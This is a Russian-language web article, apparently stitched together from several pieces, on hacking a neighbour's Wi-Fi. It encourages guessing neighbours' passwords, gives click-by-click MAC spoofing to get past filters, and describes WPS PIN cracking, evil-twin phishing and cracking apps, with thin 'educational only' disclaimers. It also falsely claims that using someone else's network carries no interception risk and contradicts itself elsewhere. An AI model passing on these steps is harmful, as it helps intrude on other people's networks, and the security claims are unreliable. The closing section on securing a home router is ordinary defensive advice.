  • Network Spoofer;
  • WiFi You.

Самое надежное, удобное и простое из них – WPS Connect.

WPS Connect

Оно работает только с сетями, защищенными технологией WPS и управляется следующим образом:

  1. На главном экране обновить список точек доступа;
  2. После загрузки выбрать точку с самым высоким качеством сигнала;
  3. Подобрать пароли из доступной базы;
  4. При наличии root-прав на экране появится несколько вариантов, которые позволят подключиться к выбранному роутеру.

Видео взлома Wi-Fi на Андроид с использованием Wps connect

Последствия использования чужого Wi-Fi

За «доброе» использование чужой Wi-Fi сети вас никто не посадит. Но если после вашего вмешательства у человека пропали данные кредитных карт, поменялся пароль его электронной почты – беспокойтесь. Специалисты без труда определят всех, кто вмешивался в файлы, кто воровал интернет-протоколы и другие полезные данные. Вас могут «потрясти», и даже отобрать компьютер, но если это не ваших рук дело – все обойдется неудобством на несколько дней, платой за баловство.

Может оказаться, что ваш сосед – талантливый программист. И если он заметит, что посторонний взломал защиту его роутера, поспешит перекрыть тому воздух, и испортить настроение известными ему способами.

Варианты защиты собственной точки доступа

Придумайте длинный, сложный пароль со строчными и прописными буквами, случайной последовательностью цифр. Даже имея на руках весь пакет перехваченных данных, хакер замучается убивать электричество и мощности ПК на подбор комбинации. Поможет придумывание нового логина и пароля к программному обеспечению роутера, так как обычно никто не меняет стандартный дуэт admin/admin.

Не надейтесь на mac-adress. Такую защиту взломать проще всего.

Видео взлома Wi-Fi пароля соседа за 5 минут

Попробуйте взломать вай фай и узнать пароль, по нашей инструкции, своей сети, чтобы протестировать её на уязвимость! Так же наверняка, многие бывали в ситуации, когда нужно срочно зайти в интернет, а своего вай фая нет. Может, вы оказались в другом городе или в гостях. Ваш ноутбук, планшет или смартфон ловят доступные сети, но они запаролены? Не расстраивайтесь. Эту проблему можно решить достаточно просто.
Как взломать wi-fi пароль соседа за 5 минут: 100% РЕШЕНИЕ

Оригинал статьи был удален по требованию РКН.

HardTek.ru и автор статьи Сан Саныч никогда не призывали и не призывают взламывать вай фай сети.

Исключительно для образовательных целей и предотвращения несанкционированного доступа мы вместо удаленной статьи (по требованию РКН) на данной странице разместили статью по информационной безопасности в домашних Wi-Fi сетях без ссылок на хакерский софт.

В качестве альтернативы рекомендуем к чтению:

  1. ТОП паролей от российских Wi-Fi
  2. Лучшие приложение-банки паролей для подключения к защищенным wifi
  3. Узнай вреден ли Wifi для здоровья

Способы взлома пароля от вай фай

Как взломать пароль от wi-fi Есть несколько способов взлома находящегося неподалёку wi-fi:

  • Перехват и дешифровка пакетов данных. Чтобы понять, как работает этот способ, нужно понимать сам принцип работы вай фай. Роутер, в который подключён кабель с интернетом от провайдера, раздаёт интернет в окружающее пространство. Если у есть желание пользоваться этим wi-fi, запрос от компьютера или смартфона поступает к роутеру, где сверяется пароль, в результате чего вы или подключаетесь к нему, или нет. Но и после успешного подключения роутер продолжает обмениваться с каждым подключённым к нему устройством информацией — т.н. пакетами данных. Пакеты информации, в том числе, содержат пароль от роутера. Таким образом, если эти пакеты перехватить или расшифровать, то легко узнать пароль от роутера. Для того, чтобы осуществить эту операцию, понадобится или высокий уровень знания компьютерных технологий, или специальное программное обеспечение.
  • Подбор WPS-кода доступа. Иногда для верификации устройства требуется не пароль, а специальный WPS-код устройства, он тоже подбирается при помощи программ взломщиков.
  • Обход фильтров. Для подключения к некоторым точкам доступа к вай фай не нужен пароль, достаточно, чтобы ваш mac-адрес был из белого списка, роутер легко фильтрует «левые» mac-адреса, и взломщики пытаются подменить их.
  • Фишинг. Не самый простой, но весьма эффективный способ узнать пароль от чужого вай фая. Суть данного способа — поднять фейковую точку wifi (одноименную со взламываемой), дропнуть пользователей взламываемой точки доступа и собрать пароли при попытке дропнутых пользователей подключиться к фейковой точке доступа. Т.е. расчет на то, что пользователи перепутают точки доступа и сами спалят вам свой пароль от вай фай.
  • Подбор паролей. Приводимый способ является гораздо более простым, в сравнении с предыдущим. Рассмотрим способ подробнее.

Важно! Сведения указанные в статье носят обзорный характер, часть материала вымышлено. Настоятельно рекомендуем не взламывать WiFi сети! Данный материал можно применять исключительно в образовательных целях для повышения знаний по информационной безопасности.

Взлом wi-fi пароля путем его подбора

Ручной и тем более автоматизированный подбор пароля точно будет акатуален всегда! Для начала, стоит попробовать самые очевидные комбинации вроде 12345678, 87654321 и т.д. На удивление, такие пароли встречаются у многих владельцев беспроводного интернета, а если речь идет о том как взломать соседский вай фай — то этот способ точно сработает, дерзайте!

Кстати, специально для вас мы составили список из 30 самых популярных паролей пользователей, вот — ТОП-30 самых популярных паролей.

Если подключиться к wifi при помощи ручного подбора паролей не получилось — не расстраивайтесь, не все потеряно! Легко использовать специальные программы-взломщики вайфая для автоматического подбора паролей, которые перебирают все возможные комбинации цифр и букв, находя искомую комбинацию. Часто такие программы работают по так называемым словарям (наиболее часто используемым сочетаниям логин/пароль) с сумасшедшей скоростью и в десятки сотен потоков одновременно. Процесс подбора может занять как 5 минут, так и час. Да, может, это долго, скучно и монотонно, но зато действенно.
Взлом wi-fi пароля путем его подбора

А может и не нужно взламывать wifi?

Прежде чем пытаться заполучить пароль незнакомой вай фай сети и тратить на это много драгоценного времени, возможно, нечего взламывать и не нужно?
Попробуйте просканировать несколько раз диапазон доступных сетей, часто среди закрытых точек доступа попадаются и незащищенные сети, которые готовы поделиться интернетом безвозмездно, т.е. полностью бесплатно.

Учтите, при подключении к незащищенным сетям требуется быть предельно осторожным, так как пересылаемая вами информация может быть перехвачена и компроментирована.

Подключаемся к открытой сети вай фай изменив свой mac-адрес

Очень часто некоторые владельцы wi-fi используют вместо паролей фильтрацию по mac-адресам. В таком случае, сеть будет выглядеть открытой, доступной и незапароленной, но подключиться к ней не удастся. Как взломать wifi соседа в таком случае? Для начала, нужно разобраться, что вообще такое mac-адрес.

Mac-адрес — это особый идентификатор, который устанавливается отдельно для каждого находящегося в компьютерной сети устройства. Для того, чтобы узнать, какие адреса разрешены для конкретного роутера, существуют специальные программы-сканеры, которые могут почерпнуть эту информацию из транслируемых пакетов данных.

После того, как эта информация будет получена, можно легко поменять mac-адрес своего компьютера на один из разрешённых, после чего появится возможность использовать этот вай фай.
Сменить мак-адрес можно быстро. Для этого нужно зайти в Панель управления компьютера, там выбрать пункт Центр управления сетями и общим доступом, и внутри него — Изменение параметров сетевого адаптера. Тут нужно нажать правой кнопкой на сетевом подключении, для которого вы хотите поменять mac-адрес.
В появившемся меню тапнем на пункт, где во вкладке Сеть нажимаем на кнопку Настроить. Во вкладке Дополнительно нужно активировать Сетевой адрес, после чего ввести новый необходимый 12-значный mac-адрес, нажать ОК и перезапустить сетевое подключение.
Проделав эту процедуру, вы сможете подключиться к беспроводному соединению, имея уже разрешённый mac-адрес.

Взлом wi-fi с android телефона

Со взломом вай фай сетей при помощи мобильного телефона под ОС Андроид дела обстаят несколько хуже, чем при использовании стационарного компьютера или ноутбука. Все дело в том, что инструментария (софта) под Android написано крайне мало и это обусловлено, прежде всего, скромными вычислительными способностями мобильных платформ относительно полноценных ПК.
Несмотря на эти аспекты для телефонов под управлением ОС Андроид все же написали несколько десятков приложений, способных либо подобрать пароль от чужого wifi, либо подобрать так называемый Pin-код вай фай сети защищенной WPS WPA шифрованием.

Приложения для поиска расшареных Wi-fi паролей

Как бы это странно не звучало, но, зачастую, не нужно взламывать пароли вай фай сетей — другие люди уже поделились доступом от закрытого вайфая к которому Вы хотели бы подключиться.
Уже 3-5 лет существуют специальные приложения, которые содержат необходимую информацию для подключения к миллионам закрытых WiFi сетей. Ежедневно тысячи людей делятся логинами и паролями от закрытых вай фай сетей через эти специальные приложения. Попробуйте установить одно из этих приложений и, возможно, не придется нечего взламывать:

  • Wi-fi map;
  • WiFi You;
  • Swift WiFi;
  • Router Scan.

К слову сказать, некоторые из этих программ наглядно, на карте, могут показать доступные WiFi сети рядом.

Приложения для скана WiFi на безопасность

ZANTI Diagnostics — приложение созданное для анализа и диагностики личных вай фай сетей. Приложение помогает обнаруживать уязвимости сети, слабые настройки ПО и выявлять угрозы безопасности для предотвращения взлома и вторжений.

Для того, чтобы использовать zANTI Diagnostics, необходимо прежде всего скачать приложение на Андроид устройство или компьютер. Далее требуется запустите приложение и перейдя в меню «Диагностика» выбрать один из двух её типов: быструю и полную.
После выбора типа сканирования — жмете кнопку «Сканировать» и через некоторое время получаете отчет с уязвимостями.

Программы для взлома/подбора паролей от wi fi

Смотри наши инструкции по настройке девасов в ютуб!

Как защитить свою wi-fi сеть от взлома?

Существует несколько простых шагов, которые позволят обезопасить личную сеть от посторонних пользователей. Многие пользователи пренебрегают ними, несмотря на лёгкость осуществления настроек. Приведём главные из них:

  • Поменять пароль, установленный для доступа к интерфейсу роутера. По умолчанию, там стоит заводской пароль, который можно легко подобрать и менять без ведома хозяина основные настройки.
  • Установить и настроить шифрование уровня WPA2 и подобрать пароль длиной более 10 знаков. Да, люди ставят пароли попроще или попонятнее, чтобы потом их не забыть, или чтобы было несложно вводить. Но можно один раз настроить и придумать сложный пароль, пусть даже случайный набор букв и цифр, записать на надежный носитель, и будет гораздо сложнее взломать домашнюю сеть.
  • Отказаться и отключить функцию WPS, которая запоминает подключающиеся устройства и позволяет даже посторонним устройствам автоматически подключаться к знакомой сети.
  • Отключите удаленный доступ в админку вашего роутера и регулярно обновляйте его прошивку.
  • Активизируйте в найтройках роутера функцию фильтрации подключаемых устройств по MAC-адресам, предварительно сообщив роутеру MAC-адреса домашних устройств.

Как взломать пароль вай фай от вашего роутера после выполнения рекомендаций изложенных выше? Да никак, это практически невозможно. Эти простые рекомендации помогут обезопасить домашнюю или рабочую сеть от любых видов взлома, но периодически смотреть кто подключен к Вашему Wi-Fi все же стоит.

Риски использования чужого вайфая

Риски использования чужого вайфая Если задались вопросом — безопасно ли использовать чужие беспроводные сети? Могут ли в таком случае быть перехвачены пароли приватных сайтов, соцсетей или файлы, которые передаёте через интернет?
Ответ — нет. Стандартных настроек безопасности, установленных в Windows, более чем хватает для того, чтобы подобного не случилось. Поэтому при подключении к новой сети честно отвечайте на вопросы, которые будет задавать операционная система, и можете о подобных вещах не беспокоиться.

Говоря о рисках использования чужого Wi-fi нельзя не упомянуть статью под номером 272 уголовного кодекса РФ, которая предусматривает суровое наказание (до 7ми лет лишения свободы) за неправомерный доступ к компьютерной информации.

  • Как вернуть роутер к заводским настройкам xiaomi
  • Как взломать вай фай на роутере от ростелеком
  • Как взломать роутер с вайфаем
  • Как взломать пароль для роутера
  • Как видеть через роутер другой компьютер